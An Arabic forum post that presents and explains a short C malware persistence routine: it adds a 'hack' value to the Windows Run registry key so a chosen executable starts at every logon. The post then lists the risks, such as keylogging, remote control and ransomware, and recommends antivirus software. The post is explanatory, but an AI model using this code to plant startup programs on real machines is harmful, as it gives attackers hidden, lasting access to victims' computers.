x32x01
  • بواسطة x32x01 ||
البرنامج اللي انت شايفه ده هو برنامج خبيث (Malware) مكتوب بلغة C. اللي بيعمله ببساطة إنه بيضيف نفسه لقائمة البرامج اللي بتشتغل أوتوماتيكي مع بدء تشغيل نظام الويندوز. يعني أول ما تفتح الكمبيوتر، البرنامج ده هيشتغل من غير ما تحس
C:
#include <windows.h>
#include <string.h>

int main(int argc, char* argv[]) {
  HKEY hkey = NULL;
  // malicious app
  const char* exe = "Z:\\2022-04-20-malware-pers-1\\hack.exe";

  // startup
  LONG res = RegOpenKeyEx(HKEY_CURRENT_USER, (LPCSTR)"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0 , KEY_WRITE, &hkey);
  if (res == ERROR_SUCCESS) {
    // create new registry key
    RegSetValueEx(hkey, (LPCSTR)"hack", 0, REG_SZ, (unsigned char*)exe, strlen(exe));
    RegCloseKey(hkey);
  }
  return 0;
}

خلينا نشرح الكود خطوة بخطوة:
1. تعريف المسار بتاع البرنامج الخبيث:
C:
const char* exe = "Z:\\2022-04-20-malware-pers-1\\hack.exe";
ده المسار بتاع الملف التنفيذي الخبيث اللي الهكر عايز يشغله.

2. فتح الريجيستري:
C:
LONG res = RegOpenKeyEx(HKEY_CURRENT_USER, (LPCSTR)"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0 , KEY_WRITE, &hkey);
هنا البرنامج بيحاول يفتح مفتاح الريجيستري اللي مسؤول عن البرامج اللي بتشتغل مع بدء التشغيل. الريجيستري ده زي قاعدة بيانات بيستخدمها الويندوز عشان يخزن إعدادات النظام.

3. لو المفتاح اتفتح بنجاح:
C:
if (res == ERROR_SUCCESS) {
    // create new registry key
    RegSetValueEx(hkey, (LPCSTR)"hack", 0, REG_SZ, (unsigned char*)exe, strlen(exe));
    RegCloseKey(hkey);
}
لو المفتاح اتفتح بنجاح، البرنامج هيضيف قيمة جديدة اسمها "hack" والمسار بتاعها هو المسار بتاع البرنامج الخبيث. كده أي مرة تفتح فيها الويندوز، البرنامج ده هيشتغل تلقائي.

مدى خطورته و ضرره:
1. التشغيل التلقائي:
البرنامج الخبيث ده هيشتغل كل مرة تفتح فيها الكمبيوتر، وده ممكن يدي الهكر القدرة على مراقبة نشاطك أو حتى سرقة بياناتك.

2. سرقة المعلومات:
ممكن البرنامج يسجل كل اللي بتكتبه على الكيبورد (keylogger) ويبعته للهكر، وده ممكن يؤدي لسرقة كلمات السر والمعلومات الحساسة.

3. السيطرة على النظام:
الهكر ممكن يستخدم البرنامج ده عشان يتحكم في الكمبيوتر بتاعك بالكامل، وده ممكن يؤدي لتثبيت برامج ضارة تانية أو حتى تشفير ملفاتك وطلب فدية عشان تفك التشفير (ransomware).

4. إبطاء النظام:
البرامج الخبيثة زي دي ممكن تبطء النظام وتخليه مش شغال بكفاءة، ده غير إنك ممكن تلاحظ إن فيه حاجات غريبة بتحصل زي فتح نوافذ بدون سبب أو بطء في الأداء.

باختصار، البرنامج ده ممكن يكون ليه تأثير كبير على نظامك ويؤدي لمشاكل كبيرة تتراوح من سرقة بياناتك لحد السيطرة الكاملة على جهازك. عشان كده لازم دايماً نكون حذرين ونستخدم برامج مكافحة الفيروسات ونخلي بالنا من البرامج اللي بننزلها ونشغلها على الكمبيوتر.
 

المشاركات المتشابهة

x32x01
الردود
0
المشاهدات
14
x32x01
x32x01
x32x01
الردود
0
المشاهدات
15
x32x01
x32x01
x32x01
الردود
0
المشاهدات
9
x32x01
x32x01
x32x01
الردود
0
المشاهدات
9
x32x01
x32x01
x32x01
الردود
0
المشاهدات
12
x32x01
x32x01
الوسوم : الوسوم
برمجة الفيروسات برمجة فيرس صناعة الفيروسات

الدخول أو التسجيل السريع

نسيت كلمة مرورك؟

آخر المشاركات

أحدث المنتجات

إحصائيات المنتدى

المواضيع
1,600
المشاركات
1,787
أعضاء أكتب كود
193
أخر عضو
HAa
عودة
أعلى